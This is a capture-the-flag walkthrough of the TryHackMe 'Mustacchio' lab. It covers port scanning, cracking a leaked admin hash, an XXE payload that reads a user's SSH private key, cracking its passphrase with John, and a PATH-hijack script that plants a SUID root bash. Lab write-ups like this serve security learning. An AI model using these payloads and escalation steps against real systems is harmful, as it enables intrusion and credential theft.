Mustacchio

https://tryhackme.com/room/mustacchio

Nmap

Start by running Nmap on all ports. We then find that SSH is open, a website on port 80 and a admin login page at port 8765.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 581b0c0ffacf05be4cc07af1f188611c (RSA)
|   256 3cfce8a37e039a302c77e00a1ce452e6 (ECDSA)
|_  256 9d59c6c779c554c41daae4d184710192 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Gobuster

Next, I ran Gobuster which found the directory /custom. In that folder we find a file called users.bak.

gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x  "php, txt" | tee gobuster.log

SQLite3

Once the users.bak is downloaded, we can see that it is a SQLite database.

file users.bak                                                                                                               
users.bak: SQLite 3.x database, last written using SQLite version 3034001, file counter 2, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 2

It can be opened with the command sqlite3 users.bak and we can view the content as such:

SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> SELECT * FROM users;
admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b

Cracking the admin password

The password is a SHA-1 hash and can be cracked easily at https://crackstation.net/

Once we have the credentials, we can use them to login to the admin page a port 8765. At this page we can "Add a comment on the website". If we inspect the Source code of the site we find the following.

<script type="text/javascript">
      //document.cookie = "Example=/auth/dontforget.bak"; 
      function checktarea() {
      let tbox = document.getElementById("box").value;
      if (tbox == null || tbox.length == 0) {
        alert("Insert XML Code!")
      }
  }
</script>
</head>
<body>

    <!-- Barry, you can now SSH in using your key!-->

This gives us three pieces of valuable information

Someone called Barry can login with his SSH
We must perform an XXE attack as we can pass XML to the submit form.
The path /auth/dontforget.bak looks interesting

If we start from the bottom, we can download the dontforget.bak file and view its content using the cat command.

cat dontforget.bak 
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>

This gives us the basic XML form we need to provide. We can combine it with a XXE payload to view the id_rsa key of Barry.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>

id_rsa

Once the id_rsa is obtained we can try to login with SSH as Barry - remember to modify the permissions of the key chmod 600 id_rsa

ssh barry@$IP -i id_rsa

However, we are prompted for a password which is not the same we used to login to the admin page.

Obtain the password with John

We can use ssh2john and JohnTheRipper to crack the password.

First, convert the key to right format then use John to crack it.

ssh2john id_rsa > barryhash                        
john barryhash --wordlist=/usr/share/wordlists/rockyou.txt

Get first flag

Once we have logged in a Barry, we can get the first flag by viewing the file /home/barry/user.txt

Get root

Now, we start by looking SUIDs with the command find / -perm -u=s -type f 2>/dev/null

which shows us that we can execute /home/joe/live_log as root.

If we use strings on that file, we find this interesting snippet.

tail -f /var/log/nginx/access.log

This seems to be a command that is executed. The proper way of doing this is probally some reverse engineering, but since we kinda know what to look for this is sufficient.

Let's try to create a custom tail binary and try to hijack the path. The content of tail should look like this. A Bash script that will copy /bin/bash to the /tmp folder and set the correct privileges.

#!/bin/bash
cp /bin/bash /tmp/bash
chmod 4777 /tmp/bash

Next, we modify the PATH variable and execute the log file.

export PATH=`pwd`:$PATH
/home/joe/live_log

If everything was successful, we can now obtain a shell with root privileges by executing /tmp/bash -p

We can verify that we have root privileges with the id command.

barry@mustacchio:/dev/shm$ /tmp/bash -p
bash-4.3# id
uid=1003(barry) gid=1003(barry) euid=0(root) groups=1003(barry),4(adm)

Now, find the last flag - /root/root.txt

PreviousGotta Catch'em All!NextNeighbour

Last updated 2 years ago